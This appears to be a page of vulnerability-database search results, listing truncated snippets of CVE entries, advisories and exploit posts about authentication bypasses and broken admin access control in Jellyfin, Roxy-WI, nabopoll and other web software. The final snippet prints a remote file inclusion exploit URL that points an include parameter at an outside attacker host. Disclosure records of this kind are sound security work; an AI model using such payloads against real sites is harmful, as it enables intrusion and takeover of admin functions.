CVE-2022-35909

In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality...

Improper access control

In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality...

CVE-2022-35909

CVE-2022-35909 refers to Jellyfin prior to version 10.8 where the "/users" endpoint has incorrect access control for admin functionality. The publicly available documents identify this as an admin-access control flaw that could enable unauthorized admin-like access via the mentioned endpoint. The...

EUVD-2022-52756

Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to bypass authentication and access admin functionality by sending a specially crafted HTTP request. This affects Roxywi version...

CVE-2022-31125

CVE-2022-31125: Roxy-WI authentication bypass vulnerability allowing remote, unauthenticated access to admin functionality via a crafted HTTP request. Affected: Roxy-WI before 6.1.1.0. Exploitation exists (exploit-db/poC references). Remediation: upgrade to version 6.1.1.0 or later; exploit examp...

Cross site scripting

Yellowfin Smart Reporting All Versions Prior to 7.3 is affected by: Incorrect Access Control - Privileges Escalation. The impact is: Victim attacked and access admin functionality through their browser and control browser. The component is: MIAdminStyles.i4. The attack vector is: Victims are...

CVE-2019-1010147

Yellowfin Smart Reporting All Versions Prior to 7.3 is affected by: Incorrect Access Control - Privileges Escalation. The impact is: Victim attacked and access admin functionality through their browser and control browser. The component is: MIAdminStyles.i4. The attack vector is: Victims are...

Revive Adserver: Authentication Bypass by abusing Insecure crypto tokens in /lib/OA/Dal/PasswordRecovery.php:

Hi, This is a fun bug I came across while doing a pentest for a client, after going through Revive Advserver's code for a few hours, I found this authentication bypass. This vulnerability seem to affect all versions, including the latest one, I was sent by one of your developers to report it here...

Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities

Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities , , . '.' '. ', . , '. , .', , / / / \ \ ==/ /\ \ / / \ / \ / / | \ \ Y Y \ / /| / \ /||| / / /.-. / /:wq x.0 '=.|w|.=' =''"''=. presents.. Nagios Incident Manager Multiple Vulnerabilities Affected versions: Nagios Incident Manager...

Page2Flip 2.5 Missing Access Control

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-033 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Missing Function Leve...

HelpDezk Multiple Vulnerabilities (Mar 2015)

HelpDezk is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2015 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Belchior Foundry VCard 2.8 Authentication Bypass Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9910/info It has been reported that vCard is prone to a remote authentication bypass vulnerability. This issue is due to a design error that would allow a malicious user access to certain admin functionality without havin...

Traq 2.3 Authentication Bypass / Code Execution

group'isadmin' 32. header"Location: login.php"; 33. This function is called in each script located into /admicp/ directory to make sure the user has admin rights, but this is a broken authorization schema due to the header function doesn't stop the execution flow. This can be exploited by malicio...

CVE-2010-5051

Cross-site scripting XSS vulnerability in admin/core/adminfunc.php in razorCMS 1.0 stable allows remote attackers to inject arbitrary web script or HTML via the content parameter in an edit action to admin/index.php...

Shareasale Script SQL Injection Vulnerability

Exploit for php platform in category web applications ============================================= Shareasale Script SQL Injection Vulnerability ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, ...

CVE-2008-7051

AJ Square AJ Article allows remote attackers to bypass authentication and access administrator functionality via a direct request to 1 user.php, 2 articles.php, 3 articlesuspend.php, 4 site.php, 5 statistics.php, 6 mail.php, 7 category.php, 8 subcategory.php, 9 changepassword.php, 10 polling.php,...

CVE-2007-0873

nabopoll 1.1.2 allows remote attackers to bypass authentication and access certain administrative functionality via a direct request for 1 configedit.php, 2 templateedit.php, or 3 surveyedit.php in admin/...

CVE-2007-0873

NABOpoll 1.1.2 is vulnerable to an authentication-bypass that lets remote attackers access certain administrative functionality by directly requesting admin URLs. Specifically, requesting (1) config_edit.php, (2) template_edit.php, or (3) survey_edit.php in the admin/ directory can bypass login c...

CVE-2007-0873

nabopoll 1.1.2 allows remote attackers to bypass authentication and access certain administrative functionality via a direct request for 1 configedit.php, 2 templateedit.php, or 3 surveyedit.php in admin/...

xero-rfi.txt

C XORON - 2007 Bug name: Xero Portal v1.2 phpbbrootpath Local File Include Vulnerablity Script Name: Xero Portal v1.2 Wrong Codes: require$phpbbrootpath . 'includes/bbcode.'.$phpEx; Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbbrootpath=http://evilscripts?...